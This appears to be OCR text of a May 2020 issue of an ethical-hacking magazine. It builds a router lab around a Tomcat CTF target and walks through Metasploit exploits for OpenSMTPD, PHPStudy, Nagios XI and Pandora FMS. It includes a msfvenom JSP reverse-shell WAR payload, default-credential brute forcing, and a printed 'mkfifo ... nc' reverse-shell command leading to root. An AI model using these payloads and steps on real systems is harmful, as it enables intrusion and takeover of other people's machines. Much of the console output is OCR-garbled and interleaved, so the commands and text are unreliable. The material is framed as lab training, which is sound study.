Ft eee eu dl [6S Eye) to paeicode Cyber Security Magazine May 2020 Edition 3 Issue 5 a: Mates Simulating and ck Nb foyer Q. H 4 Bi bt San f iu Over 10 Prorat exploit modules explained. HACKSTORY: aT TT ccs Part :2 - Writing your own exploit. Linux Privilege Escalation : ( Cont'd)Then you will know the truth and the truth will set you free. John 8:32 Editor's Note Hello aspiring ethical hackers. Hope you are all awesome and safe. We ag back with our May 2020 Issue. With this Issue we will be delving into the m- 1in goal of our Magazine : simulating real world hacking scenarios. This has alw ays been our goal and we have not lost sight of it all. Since we have completed| a our pending Issues we are right back on our target, This scenarios will help ur readers understand how hacking takes place in real world. For starting, we \will deal with a scenario where a web server is behind the router but on another Inetwork. We will be creating this lab in Vmware and Virtualbox which means ou -r readers can easily simulate.iton their software. The target is a simple one thi- |s time. But we want our readers to learn some important things here like port fo -rwarding, SNAT and DNAT ete. These are some of the networking topics that ou will see in real world and knowledge of them is very important. Once you ar -e through it, we can move to simulating complex networks. Win part 2 of our Buffer Overflow tutorial, our readers will learn \how to write a simple buffer overflow exploit to the vulnerability we saw in our jprevious Issue. You will be doing this in python. Apart from this, other regular features are present. We are sure our read- lers will like this Issue. That's all we have for now. Until the next issue, Good \Bye. Thank You. Stay Home, Stay Safe. oh chakravanthe “THERE'S A MISCONCEPTION THAT TO BE A SECURITY EXPERT YOU MUST DABBLE IN THE DARK SIDE. IT'S NOT TRUE. YOU CAN LEARN EVERYTHING YOU NEED TO KNOW LEGALLY. STICK TO THE GOOD SIDE.” - MARCUS HUTCHINSINSIDE See what our Hackercool Magazine May 2020 Issue has in store for you. 1. Real World Hacking Scenario : Creating a Real World Hacking Lab involving a router and hacking a machine behind it. 2. Fixit : Fixing the "cannot load bundler” error while starting Metasploit Framework. 3. Metasploit This Month : Ten different exploit modules. Can't name every one here. 4. HackingQ&A: Answers to questions our readers ask. 5. Buffer OverFlow Explained : PART -2 : Wirting the first buffer overflow exploit \6. Linux Privilege Escalation (cont'd) : Exploiting Cron jobs and SUID bits. 7. What's New : Some new changes that came in cyber security. 8. Online Security : Charging your phone using a public USB port? Beware of ‘juice jacking’. 9. Hackstory : Kronos.CREATING A REAL WORLD HACKING LAB AND HACKING IT REAL WORLD HACKING SCENARIO For someone who is learning ethical hacking or penetration testing many doubts and questions arise. Some of this questions include how to hack a system behind a uter or a firewall, how to do penetration testing over internet, how to hack if our atta ker system is behind a router, how to do hacking when both systems are in different Ns, what's an IDS, IPS and Honeypot etc. Most of the ethical hacking courses perfo 1m their hacking scenarios with attacker and victim system's in the same LAN. That's 'sy to simulate and also easy to hack but their scenarios are very far from the real rid. So we have decided to bring (or may be the correct word is resuscitate) a new ture called Real World Hacking Scenario (RWHS). Here we will simulate some of th- real world hacking scenarios so that our readers can get some real world experienc- of ethical hacking. We want to make it a comprehensive tutorial and for this we will teaching our readers how to create the LAB themselves and simulate the attack. The first scenario we will be creating is a simple scenario of a web server behind a uter. Most of the times we will not be seeing a web server behind a router as nowad ys they are being hosted separately on dedicated servers (Bluehost, godaddy etc). jut there may be some cases where some users may want to host a web server in the ir home out of enthusiasm or curiosity or just because they want to save some cash. It is this scenario we are simulating. The main thing readers should focus on here is Jearn about creating the labs on virtualization software. lin this scenario, we will create an Apache Tomcat Server that is hosted behind a router. Ima- ine there is a common user who wants to set up a Tomcat web server at his home.As usual ny homes have a router nowadays. This scenario has two parts. They are 1. Creation of he Vulnerable Lab and 2. Hacking into the target machine. 1. Creation Of The Vulnerable Lab. is is the picture of the lab we are going to create. External iP: 192.168.26.152 & Hackercoat ‘Atacker System: KALI UN rar omae 1P Across: 102.168.2628 8: 102.1688510 Target System My Tomcat Hostfe need three virtual machines for this Tab apart from the virtualization software (Vmware or irtualbox). They are 1. Kali Linux (Attacker system) (assuming already installed) 2. Vyos (Router or Gateway) https://www.vyos.io/rolling-release/ 3. My Tomcat Host (CTF Machine) https:/Avww.vulnhub.com/entry/my-tomeat-host-1,457/ \Vyos is an open source router and firewall software that can be installed just like any other is0 file. It can be downloaded from the link given above. My Tomcat Host is a CTF machine pureed by Akanksha Dev Verma and can be downloaded from Vulnhub at the link given ab ve. It's just like any other CTF challenge we undertook in many of our previous Issues but th] only difference here is the target is on another network. First install Vyos iso in Vmware or Virtualbox with general specifications. Since Vyos |will function as a gateway or router, it needs two network adapters : one for external and ano ther for internal network. Whether you are installing Vyos in Vmware or Virtualbox, it already gets one network adapter by default (mostly NAT). We need to set the second network adapt Le manually. Let's see how to add a second network adapter in both Virtualbox and Vmware. In Virtualbox, hit "Ctrl+H" or go to the File Menu and select "Host Network Manager”. A jindow opens. It shows all the Host networks present. To create a new host network,click on pereate” It will automatically create a new host network. Here it created the host network 5. Bl Host Network Manager = a # Network: IPv4 Address/Mask IPv6 Address/Mask DHCP Server * 169.2542037/16 © Enable 192.168.212.1/24 CO Enable Adapter DHCP Server O Configure Adapter Automatically © configure Adapter Manually v4 Address: [192,168.212.1 v4 Network Mask: [255.255.255.0 Reset only ose It is assigned an IP address automatically by Virtualbox. You can change the IP addres if you All your doubts, queries and questions about ethical hacking and penetration testing can be sent to [email protected] or get to us at our Facebook Page Hackercool Magazine or tweet us at @hackercoolmagz." [Pd Address/Mask IPv6 Address/Mask DHCP Server VirtualBox Host-Only Ethernet Adapter #4 169.2542037/16 © Enable VirtualBox Host-Only Ethernet Adapter #5 192.168.212.1/28 D Enable Adapter DHCP Server O Configure Adapter Automatically © Configure Adapter Manually IPv4 Address: [192.168.66.1 Pv Network Mask: PV6 Address: |fe80:1e98f:8c73:c6ab:1f83 IPV6 Prefix Length: |64 Reset lake sure that DHCP server is not enabled for this network. {3 Host Network Manager 32S | Name Pd Address/Mask IPv6 Address/Mask DHCP Server * VirtualBox Host-Only Ethernet Adapter #4 169.254.2037/16 Enable VirtualBox Host-Only Ethernet Adapter #5 192.168.212.1/28 Ci Enable Adapter DHOP Serf Cl Enable Server Server Addvess Server Mack Lower Address Bound Upper Address Bound: ‘or changes to take effect, click on "Apply" and then click on "Close" to close the window.fiow ‘open Vyos virtual machine settings, go to network settings and enable the second netw- rk adapter and select the Host network adapter 5. Click on "OK". @ vyor- Setings 7 Fy ser intetace @ Wyos- Settings ? a on Network [By stem Adwter 1 Adeter 2 Adeoter 3 Adeoter 4 [BD disney ert Netw Adapter BD smn tae oi = > Auto wast Bre | £3 swarrons OO vs (ED steed Fier | vewtnerace | b[Let's see how to add the second network adapter in Vmware Workstation. Once Vyos is insta Jled, go to the virtual machine settings and click on "Add" and select a network adapter. This would be "NAT" by default. rar und nee neh Pao (Oca nck ratremot |Change it to "custom" and select any network vmnet2,vmnet4 to vmnet7, or vmnet9 to vmnet |19. vmnett is reserved for the default host network, vmnet8 is reserved for the NAT network. Ce ewefe don't select those. Here we selected vmnet3. Click on "Ok". Go to "Edit" menu and open 1 Virtual Network Editor. Click on "Add Network’ © Vitual Network Editor x Name Type ExteralComecton portComecton OK? Strat Adress etd ged Reel RT7ZIE Wrele. nett Hestorty Comeced led 92.88.3800 wet MAT NAT Comecied led 92.68.380 R SS Mitt. || neat | ae et nematon (Gordo comet ect toe entra retort) ‘doe to: Reel T7238 Wreess LAN B02 in PCE NEC Aihmate Stir. (nar Goa nets arse nth) Na etree. Ost ry comec stray ma rate eter) Correct a hott rt set etre Uae OM sericea ae 1 Seto. =] zi festweefads| | treat. | | Bowt.. « 7 we e neve Te Extra Comecton owtCemecton OK Sarat dese eto ged Rea TLE ees, Wet vesterty = Comeces Ente 192.68.600 Wetton Coeced Ete 2168.80 Ont (ured heats arse) na stron Onortrt amec rte na srate eter Cnmect host rh taper fi netor Uae OFC serve to ett aes oe OH Seti. ‘este Defnts) | tnpart. | | Boat. ox) (coe) (a veJA new network will be created as highlighted below. ‘Smet: [192368 65 0) Subnet mass [255 255.285. 0] (etre Defads| [ treat. || Boat. ~ covet be on the new network "“vmnet3" to make changes to the network and disable the DHCP ver by unchecking the box below. You can change the subnet IP. We changed it to the IP \ddress 192.168.55.0. net nemanan Ceres ome dct oe enteral ete) réged : Reah ATLA res LA 8D Ln PCE Oar hare haat adres wth) © vestry amect rte na priate cet oarect shot wal apt to th eter restr alate nave Were Net Adair re ac HCP service Stade ates oe ‘inet: [95.550] etna (25 8 30 ] ‘ese eta) [ oat.) | Geet. | [To] | coehat's it. Now, let's install the Vyos OS. Note that till now, the operating system of Vyos is in lLive mode and it is not installed to the hard disk. Start the Vyos virtual machine. eee See T Cue eae ene a eC ey lLogin into the system. The default username and password is "vyos:vyos" PSC co ieemrearen 128-and64-vyos #1 SMP Sun May 3 18:48:11 UTC 2828 x86_64 programs included with the Debian GNU/Linux system are free software era ets et ec cae etc hte est cr renter SSC rem teess r Cee teat (OR ae Rea Ceo feck ee eee Cr ‘ype command install image. oe OTT Pert Cace cc Temes ts Tre erect eR Cw ear amt rnt tC wor Prete rare Cees rts it Pte Jould you like to continue? (Yes/No) [Yes]: ye See een Treo ee Cee ee Teer mettre ie mere) ere se a etre arc ee Stet g eT Sentero rere r cere errr reyes were eT Seen etn tar etre te Tie tT nT For most part, select the default options.lEnter the password for the administrator a prompted rs) Ot MCC aCe se da err Ce Ce Cece) WPeTe MCR SOME MCLE. Coos) ontinue? (Yes/No) [No]: Ye COR eee Teste C UR Cer reel Meese esc) reating filesystem on /dev/sdal: OK (eens Mounting /dev/sdat are CMmer CRC eC MCMC meme mettre Ieeg) TR IeCT Cem et Eee eerre rity SMe teem CTT) Te emcee mec ce mrCcrerar tit scat eee tar eager eet Ts earner oe ae Ce luhich one should I copy to sda? [/opt/vyatta/etc/config/conf ig. boot} VELMA OTC ce eT etic @ceet utes thirteen ny password for user ‘vyos So eet : Tito M Cae CC te OCC a aCe er da arr) CC Ck Ce Ce ae sts R Ler Cs SSC eT LE) iors) nce GRUB is insta installation is finishes >mmand show interfaces to network interfaces. a or State, L - Link, u - Up Don, A - Admin Down eeertry Tone me erat stay the for rt rr el at) yos@vyos:~$ configure CC ERS str) oeeserarr se address dhcp Parte ElLet's set the external interface to receive IP address from the Vmware DHCP server as this lis how internet works. Use the command in the above image to do this. Thi ernet network for us. So let's set a name also to the interface as shown below. The comman ds commit and save make the changes permanent To a a errs Bercerrs) Streets C Me Let et ec) Now let's set the internal network's (ethO) IP addresses. Unlike eth0, and normally in LANs. DHCP server assigning IP addresses to the clients of the LAN. This can lbe set using the commands shown below. interfaces ethernet ethi address 192. 168.55.1/24 yos@vyos# set service dhcp-server shared-netuork-name ethi authoritative erresy ent et CC eet a Se Lac ae) ere eet are erres] yos@uyos® set service dhcp-server shared-netuork-nane nna peers (el ee oC Us mee ees cnt TUE tT) yoseuyos# set service dhcp-server netuork-name ethi subnet yas an nr eerag he eT, Cy ertes) yosevyos® set service dhcp-server shared-netuork-nane subnet etre CC AT) erres] Repeat erent ertes) erent ts CMe Let Let acs (etree hese commands set the router's internal IP address as 192.168.55.1, set this address as th e default router and dns server. Here, we also set that the IP addresses of the LAN should tart from 192.168.55.10 and end at 192.168.55.50. Use commands commit and save comm ands once again to preserve the changes. Now once again type command show interfaces now to see the IP addresses and you wi se odes: S - State, L - Link, u ~ Up, D - Down, A ~ Admin Down fesets: on Pam aT aco) the ere ee c feet Soy Cre ez ran rr ee naan rat)INow install (if you have already installed it) My Tomcat Host CTF machine and set its networ k adapter to the new host only network we created at the start of the tutorial. Boot up the My ‘omcat Host machine. Once it is successfully boot up, ping it from the Vyos machine. Note that while setting DHCP server on the internal interface, we configured a setting that the assi gned IP addresses should start from 192.168.55.10 and end at 192.168.55.50. Since My To meat Host is the first machine joining this network, its address will be 192.168.55.10. If we g et successful echo reply (as shown below) the internal network is set. yosevyos: $ ping 192. 168.5' re traeC erste) Et) er ee Sr eet rT) ese este eee 4 ert rT) Bice eee Tericeeit rT) CSE eee eee peer rT) ote cse este eee eC CMTE mesg] h1 packets transmitted a ae errata ree re err rrr eevee 2 13 destination address '192.168.55.18 See ster PEON SCN Coe at) Cee er eR oC mars Cera Cems Pare lLet’s see the commands in detail. In the first command we are setting a firewall named "whts in" and set a rule number 13 with action “accept”. This means we are setting a rule to accept| onnections. Since we have set a rule to accept connections, we need to specify on which a- Kidress. The second does exactly that. We want 192.168.55.10 (My Tomcat Host) to accept onnections. The third command specifies on which port to accept connections. Since the tar get is a Tomcat machine, the port we set is 8080 (Apache Tomcat runs on port 8080 by defa| ult), The fourth command sets as to which protocol connections to accept. Since it's a web s erver, we think tcp is enough. The fifth command enables this rule. Commit and Save.INow here we have a Apache Tomcat web server in the internal network. What is the use of a eb server if it is not accessible to everyone on internet. So let's configure a DNAT on the ro- ter. cra) yos@vyos# set nat destination rule 1@ description ‘Port Forward apache toncat t > 192. 168.55. 18 fortes] yosevyos# set nat destination rule 18 destination port 8888 er tes | yosevyost set nat destination rule 18 inbound-interface eth® wyost set nat destination rule 18 protocol tep 4 # set nat destination rule 18 tarnslation address 192. 168.55. 18 Configuration path: nat destination rule 18 [tarnslation] is not valid Sareea eT fortes] = ree ee ae Cosa) ORCC Ce a el Cea COSC at) CSC oe Ce Ley) 6 Cena Css Cr aC) CRC ae) Cn ing configuration to '/config/config. boot ith the first command, we are adding a description to a destination NAT rule which we gave number 10. The second command specifies which port this rule is configured for. The third ommand specifies the interface (since we are allowing external machines to access an inte- Inal machine, this should be set on the inbound interface i.e eth0).The fourth command is for Ksetting the protocol. The fifth and sixth commands specify the translation address and destin- tion address respectively. The seventh command specifies the translation port. It means any packet that comes to the destination address 192.168.36.152 and port {8080 will be forwarded to internal IP address 192.168.55.10 port 8080 where our target is list ening. This is also known as port forwarding since we are forwarding port 8080 of router to a port of an internal machine.lf you see the network diagram, there are other devices too. They all need to access the inter net so we need to set Source NAT. Let's set SNAT for the Tomcat Host. This are the comm- ands to set up Source NAT. a OS Sa) et nat source rule 16 protocol ‘all’ > See CRE eC Cease) Configuration path: nat source rule 16 source laddresss] is not valid arerecr | (orees) Serer ee ere ce eC ae ae erres) Sere eh ee translation address 192.168. 36.152 eait) r he above commands allow all protocols from internal machine with address 192.168.36.128 outside the network (i.e internet). With this the lab is ready. It's time for Hackercool to take ov er. 2. Hacking into the Target Machine. IHi, | am Hackercoo. | was casually scanning the network with Nmap to find any LIVE hosts w ith some ports open when I found one. Peto et Penne) Ss RPG ee ee eee Ue eee OC ee Host is up (0.00195 latency). Nmap done: 31 IP addresses (1 host up) scanned in 2.84 seconds hackercoolmagzakali:~$ hen | ran a verbose scan on this IP, | found one open port on the target. It was port 8080 g enerally used by Apache Tomcat and the version of Tomcat running on this target is 9.0.31 hackercoolmagz@kali:~$ nmap -sV -A 192.168.36.152 Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 06:35 EDT eu ag Cee eee Host is up (0.0015s latency). ee asd CS oe) 8080/tcp open http Apache Tomcat 9.0.31 http-favicon: Apache Toticat http-title: Apache Tomcat/9.0.31 SRC asCUn e Ce eeeUreeOee/oed Sap tae Nmap done: 1 IP address (1 host up) scanned in 7.93 seconds ie tesrere teers | ‘omcat is an open source Web server that provides a pure Java based web server. The first /ersion was released 21 years ago in the year 1991 Although not very popular, it is estimate- Kd that Tomcat has around 0.2% of share among web servers. Some of the famous compani- es using Tomcat are Alibaba, Snapdeal and Los Angeles Times (DON'T TRY THIS ATTACK ON THESE SITES. IT IS ILLEGAL).ter checking in searchsploit and finding that this tomcat has no exploit,! ran nikto can on the target. ee Un nt bores 192.168.36.152 Target Hostname: 192.168. 36.152 3 8080 ply Sere Cc eo Server: No banner retrieved ecmstcs ost eegr eC ea a be cmos eee ru eee ae Cee une ed + The X-Content-Type-Options header is not set. This could allow the user agent to eee ee UR Ceo e seer 4 + No CGI Directories found (use '-C all’ to force check all possible dirs) + OSVDB-39272: /favicon.ico file identifies this app/server as: Apache Tomcat (pos Ee eM eM Cees Ree cists Pe eae ee ad + OSVDB-397: HTTP method (‘Allow’ Header): 'PUT' method could allow clients to sav eee es pe Cut eygt ea ee re Cee Coe ee Eo CR ee ee eC ee Stun na Cees Cg emote + /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 Happiness Page identified which inc Ue eis um orton pee CSc ae CM a Te ee CU ee OD a MAS a PCO ioe Cu ee ee Oa a eC) /manager/html: Tomcat Manager / Host Manager interface found (pass protected) /axis2/services/Version/getVersion: Apache Axis2 version identified. /axis2/services/listServices: Apache Axis2 WebServices identified. /axis2/axis2-web/index.jsp: Apache Axis? Web Application identified. ae pe eee eee ae eS a /manager/status: Tomcat Server Status interface found (pass protected) 8041 requests: @ error(s) and 18 item(s) reported on remote host etd PUT ee cle CR aE) peo mc Nikto found our Tomcat target configured with default username and password. The default and password of Tomcat is (tomcat: tomcat). This is a never ending problem with | world. Many ust still use default credentials for web service: Metasploit has a default tomcat manager login module to test if the target is using any common or default passwords PSTewe ern ace mT msf5 auxiliary( ee st Module options (auxiliary/scanner/http/tomcat_mgr_login): Dry (nest Required Description Da no be ACU edcr me U Reon a cers PCO} no LU sme eters Lome ad UE ents er ere aaa ed Eriean tress cry Biter ers ee meas Proxies til...) Po ory ORC He ade et Td oy The target host(s), range CIDR identifier, or hosts f PCr tee Cas Sire Cia oe are) ce Det WAR ru eet BR move) Be eRe Ce ee Rd TARGETURT oes ry oe Ue Cm Cras az) rt yes ACO) Tea cr ue ee eters) Ces Ce eter ee eee ee ee Pitas a PC eee Ce eee ees Carrere etry PoC faery cr Try the username as the password for all users Teams 3 EE ere eae eeepc a tee ETiea st a) Pit u eee Ce mcr) Nac ary yes SU eed NE cr Ducts ad Crewe eS tetial¢ don a Perey ce ere pe tee re ers PMre Tier ) > set stop_on_success true ems Priam sttttay( eer [1] No active DB — Credential data will not be saved! 192.168.36.152:8080 - LOGIN FAILED: admin (Incorrect) 192.168.36.152:8080 - LOGIN FAILED: :manager (Incorrect) pty eet eet] LOGIN FAILED: pS ecco ss 49) pC aC eet esc m yan root (Incorrect) UPC etre Pe UR stomeat (Incorrect) treet wer etr) esc mys :s3cret (Incorrect) preter eetr LOGIN FAILED vagrant (Incorrect) pC mt eT ety LOGIN FAILED: manager:admin (Incorrect) pore eed - LOGIN FAILED: manager:manager (Incorrect) CPR ELE em ee TTT) 192.168.36.152:808@ - LOGIN FAILED: tomcat:role1 (Incorrect) SU EL etre emt gum villas eet Tae Cresssta9) 192.168.36.152:8080 - Login Successful: tomcat: tomcat Scanned 1 of 1 hosts (100% complete) eC ace ste eee)As | have access to Tomcat now, lets login using these default credentials. ow I can upload a malicious payload as a WAR archive containing a JSP application. Meta- ploit has two moudles that can do that. They are, 1. exploit/multi/http/tomcat_mgr_deploy module 2. exploit/multi/http/tomcat_mgr_upload module ‘Tomcat Web Application Manager (sansonsnautascaseis! wre sencted [so | used msfvenom to create the malicious WAR payload. | named it hcool.war. We have b- een using msfvenom a lot, so | am sure you definitely can understand the syntax hackercoolmagz@kali:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.36.128 te ee ee recs UCR RTT Final size of war file: 1090 bytes PSU tea gt |he payload is ready. To deploy it, scroll down on the target website and we can see a uploa d option as shown below. After uploading the "hcool.war" payload | just created above, | clicked on deploy button to co- Implete the upload [Before doing anything with the payload, | start a netcat listener on port 1234 to receive the in coming shell reer Petree Creo Clap ett een On the target website, | scroll down to see my war archive. centreon Priam ep tag ees 192.168.36.144:80 - This module does not support check. Peewee ema rae Cee PEC SECT) Uhost = 192.168.36.128 parece ee | After all the options are set, execute the module.Parcs eT Be eC UCSC EL Set LET rry Su estate Cece ra ome ae sees ec ea ees cos er eRe es URS Re Cm mest erste Command shell session 1 opened (192.168.36.128: t 2020-05-07 17:53:42 -0400 Bt] SON CON at ee a i Cou uu uO eee broker) ,998(centreon),999(nagios) irre) Linux centreon-central 3.10.0-1062.12.1.e17.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2 CUR ae ere ets ‘ou should get a session as shown in the above imag OpenSMTPD LPE Exploit Module ‘ARGET: OpenSMTPD < 6.6.4 on OpenBSD 6.6 ‘TYPE: Local FIREWALL : ON OpenSMTPD is a free implementation of server side SMTP protocol. SMTP is used to excha nge messages. OpenSMTPD 6.6.0 has a out of bounds read vulnerability which is exploited by this module to execute a command as either a root user or a nobody user, thus giving the user elevated privileges. Let’ s see how this exploit works. First let us get a low privileged shell on the OpenBSD ‘stem using the ssh_login module. Load the module as shown below. Pe ere ry ieceerrstet ion ers cLr CCC 1s CuPc saet a7 ec Une Um UD} Pe Current Setting Required Description Ce eo Ty Try blank passwords for all user Cia eet Sry Cee ee ee es Oe Pe Mee foe Try each user/password couple st CeO Murat Cie rrty Pee false COC UR eee tg Cel emma mers Cae fever OC UR eas Cee mets Po) A specific password to authentic romret Cmte File containing passwords, one p| Camenry las Pry Scr a Ca Se ees eS Stop guessing when a credential Pence esa CeCe Carta) Tess no hte as Tem ns it Cee es eee ea Coe Tee er no meee aac no ets Nas Tae ire treate ten! eee ieee sare leg Pree Beata pee) cise ee esaee leg! Ec eeee reece tLe) Creweesaet lo > run [coe tree ve tL Pee re Me oc cg Umea CURR Ue Cree eer REPEL T yy 020-05-03 60:14:32 -6460 ] Scanned 1 of 1 hosts (100% complete) ] Auxiliary module execution completed irae esaeciert PPeersere rey Active sessions Con OSC eee ay n user. Now seat ETrsnEE TTI ees Coan mir es Pac aedet sti) SSH ssh-user:@Bcd1234 (172.28.128.13:22) 172.28.128.13:22 (172.28.128.13) oe are este Maiist File containing users and passwo| ee eee File containing usernames, one p| CeCe Uae Seen Peer password @Bcd1234 rhosts 172.28.128.13 Cee SUP ael ete ETe rs ae) Connection SU Peele) ie opensmptd eae Cars Pry eee r) CR CSRs EMAC) Cm ct OBERSHTPO 008 Read Local Privilege Escalation exploit/unix/smtp/@pSnSmitpd mail from rce Po eer east) Pets Prete eer)lLoad the module. ee RCC aC une mm mC mercer yea ) > show options Module options (exploit/unix/local/opensmtpd_oob_read_lpe) Pru ees mee Me Cet SC 30) Srey esc ee eee Cer Se a) i Cc eee Cea PO eee ee Ce eee) Carry Sy The local port to Listen on ee feed ny Test emer es asc ates or Path to a custom SSL certificate (default pe Sar Ce) Payload options (cmd/unix/reverse_netcat) Ce ees Or Mc Maes fo rr eC mC Ua c ea ae cified) Cee) Srey met cUm iad Tt takc leas Id Name © OpensMTPD < 6.6.4 (automatic grammar selection) iPr Mo ea Perera] ce Pte) Chemo coed| emote [!] SESSION may not be compatible with this module [*] The target appears to be vulnerable. OpenSMTPD 6.6.0 appears vulnerable to C Varley ieee Coe immo aC eat 172.28.128.3 [Orriseete er ee eee) aa All your doubts, queries and questions about ethical hacking and penetration testing can be sent to [email protected] or get to us at our Facebook Page Hackercool Magazine or tweet us at @hackercoolmagz.frome ites] ear [1] SESSION may not be compatible with this module eee Ree ee Creer ere rrr) Executing automatic check (disable AutoCheck to override) Ri oe ee RC I eee eC ns \VE-2020-8794 ea eer et te a ere) ensure eC SL Eee SOc Laem nC omer a1 Bed 28.128.3]' < /dev/null && echo true ieCrrep eer“ BER Ruut) SOtsU OR i Lee ane Psu ee ee Cee ur mor Coes Sending: 220 Expecting: /EHLO / eu Eee) Ese) Cec eC eea ieee) CeCe eae mda-exec: mkfifo /tmp/zdhgw; nc 172.28.128.3 4444 @/tmp/2| dhgw 2>&1; rm /tmp/zdhgw; exit @ *] Disconnecting client 172.28.128.13:47665 Command shell session 3 opened (172.28.128.3:4444 -> 172.28.128.13:44932) at 2020-05-03 60:17:16 -0460 Poems ro /bin/sh: [4]: wd: not found ee) SOE ee a ee) Cn Ree eee) id erro ee CTO el ee Co) s you can see, we have root privileges now. Study Backdoor Exploit Module ‘ARGET: PHPStudy h php-5.4.45 + Apache TYPE: Remote IPHPStudy is a free software that acts as a integration package for a PHP debugging environ ment. The PHPStudy package includes Apache, PHP, MySQL, phpMyAdmin, Zend Optimiz- ar etc. It is a one click installation package. PHPStudy 2016 and PHPstudy 2018 versions are vulnerable to a backdoor vulnerability However this vulnerability works only when php version is 5.4.45 for PHPStudy 2016 and 5.2.17 for PHPstudy 2018. Let's see how this exploit works. The download link of the vulnera ble software is given in our Github repository. Download the vulnerable software and install jt on a windows system as shown. We tested this on a Windows 7 system.‘on the part highlighted In the Image below.oor_rce module as shown below. Neem ttsitetist alta memes irewee yc ed ) > show options DrmCR stim Cte esteem Cees) rou eae as tr Me mae Let) eeetry cr A proxy chain of format type:host:port[| stypeshost:port][...] Pro ie The target host(s), range CIDR identifi| CU mctCR CCUM Te meee td a rt) very The target port (TCP) coe ier rs Poste eae ecu cas! lons TARGETURI / ery See Mira cr Dae ae aed a eICStamele cg Id Name CR reget Cero) et the required options as shown below. ect er eC rete) or eet ee) Prete eos eet eC MRC ae ee eC Gritsast th eter ses as shown below. ) > run eR eC Ue eee Ce EE Eee Ty omc ume ater eeu scl MLL ce Cree eee eC) eM CU UL etree etree Mee Cree eee eCE OEE Lg OLE Ee areas Cer) Gracie ee ae ita vent tag meterpreter > sysinfo Gorm POO n ae Windows NT ADMIN-PC 6.1 build 7600 (Windows 7 Ultimate Edition) iS Te ee UL iiatta dee CT) Cerca SOS irateNagios XI Authenticated RCE Exploit Module ‘ARGET: Nagios XI < 5.6.6 TYPE: Remote FIREWALL : N INagios is an open-source computer software that is used to monitor systems, networks and infrastructure. It can monitor servers, switches, applications and services and alerts users wh en things go wrong and also when the problem has been resolved The above mentioned versions suffers from a remote code execution vulnerability that an be exploited if credentials are known. Let us see how this exploit works. We tested this jon Nagios XI 5.6.5 installed on a Centos minimal system. Let's set the target. Install a minim- | system of Centos 7 and download Nagios XI 5.6.5 onto the target system. Extract the arch ive as shown below. ere as ers er ee ee ee ore] Received % Xferd Average Speed Time Time et Dioad Upload Total Spent Left Speed ee en Peer ET ae) Sere eet eee as) Ie ene eae Peet eet es aes ee perenne ena ae ees eae eT ere Me ree mis script will do a complete install of Nagios XI by executing all necessary sub-script ee ee eC aC i ee er: bebian, or Oracle. Do NOT use this on a system that has been tasked with other purposes or ha n existing install of Nagios Core. To create such a clean install you should have selected pnly the base package in the 0S installer Porras eens trea Cee eee ret tts hecking MySQL credential Coens neti rs merit nae ar Ue aes Ta ieee td installing Magios Repo PKG: packages/nagios-repo-?-3.e1?.noarch.rpm ar peoreeanri ane ee) parch.rpm: Header U4 RSA/SHAL Signature, key ID 1e924cb3: NOX Ler hea Aoi heres ne ST Pee eee o fer some time, the installation finishes as shown below. ert eoeoees tat can access the Nagios XI web interface by visiting nace eC att} eet eet eee er)flow go the above highlighted ‘and change the password of the nagiosadmin user Nagiosadmin is the default admin of the Nagios XI. The target is set. Now, start Metasploit a- nd load the nagios_xi_authenticated_rce as shown below. Pee a a a eee masd cme eC Pe CC CA eC metas me Name ee sU mer me rest isc) PASSWORD Re eet Coste ee UR ar rier oas ens ypezhost:port]L ... ] Coo The target host(s), range CIDR identifier ROM eC Cmte Crag cy rod The target port (TCP) SRVHOST 0.0.0.0 yes eC eC Ree ria CO ee ee a SRVPORT 8080 yes mca eet ee oe cele] no Pst MCeoU eeu asta) Bones cr CR Moc emote CmC Leg Ee Om) TARGETURI / CeCe stra g oN The URI to use for this exploit (default pre) Tea Oa Sere) Teste) vHosT aes Payload options (Linux/x64/meterpreter/reverse_tcp): sae Most sty os yes The Listen address (an interface may be speci fied) Ome yes LC eiun cas options and use check command to confirm if th or not Pacer ETE CELT) Sree Cee ery parece ee eu eeu) Parmer em rise Cy eee eeer) Uhost = 192.168.36.128 msf5 exploit( er 192. 168.36.145:80 - The target appears to be vulnerable. Target is Nagios XI w RC Parmesice Es | hen executing the module gives us a meterpreter session as shown below. All your doubts, queries and questions about ethical hacking and penetration testing can be sent to [email protected] or get to us at our Facebook Page Hackercool Magazine or tweet us at @hackercoolmagz.msf5 exploit( err ee Ce Cae EL SeCL Er) Found Nagios XI application with version 5.6.5. Uploading malicious ‘check_ping' plugin . Command Stager progress - 100.00% done (897/897 bytes) Sa Cec tn Executing plugin... Pts ee Umm ae eee aC eee TSU ac CEL State eee eet) Pao ge Cue eu etree CRC et LET ee ORCC Ed 2020-05-23 12:39:06 -0400 tse iets a Sumer cu) [1] Failed to delete the malicious ‘check_ping’ plugin: Connection failed. Manual ecu ec rte Peer ee Tsar) Computer : localhost. localdomain rr ott eet Mee eR Ce ite aD) eer ee) BuildTuple x86_64-Linux-musl Pest eee Aes Paiste te) Oe oe CU ne UC r CL Ba oe » euid=0, egid meterpreter > Pandora 7.0NG Authenticated RCE Exploit Module TARGET: Pandora FMS <=7.0NG TYPE: Remote FIREWALL : Not Applicable Pandora FMS stands for Pandora Flexible Monitoring System. It is a software used for monit- pring computer networks. It allows monitoring the different operating system rvers, applic ations etc in a network in a visual way. In the above mentioned versions of the software, there is a remote code execution vulner y in the net_tools.php component. Let us see how this exploit works. The download info rmation of the vulnerable target is given in our git repository. The target is a OVF and can be| Installed in any virtualization software. Load the OVF and start the virtual machine. The targe tis set. Let's follow the usual scanning process with Nmap as shown below. PT ono Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 07:52 EDT Pec URS eC Cees Host is up (@.00095s Latency). eee este easy ee YS ee ee) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/S.4.16) 3306/tcp open mysql MySQL (unauthorized) 8022/tcp open http Pandora FMS (timezone: +0200) Se eC a Ce eee Ue eee eee ace) Tip ae iS ace Oe ae Me ee Red b tool to find what service is running on ther~$ whatweb 192.168.36.149 (cL MOse eee Gaia eee rt ][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[192.168.36.149], Meta-Refresh-Redirect temas a ce | [200 0K] Apache[2.4.6], Cookies[PHPSESSID], Country[ RESERVED] [zz], HTTPServer[ Tere Re ee eI PRUE ME ee RM et ere eth cae re Me a ett Cees ets eles cept ears me cso) Foci thiesde fico ticr te ea cnsett ese laeemeet aemoeas Peer Peace ed Peace ome’ Description CR 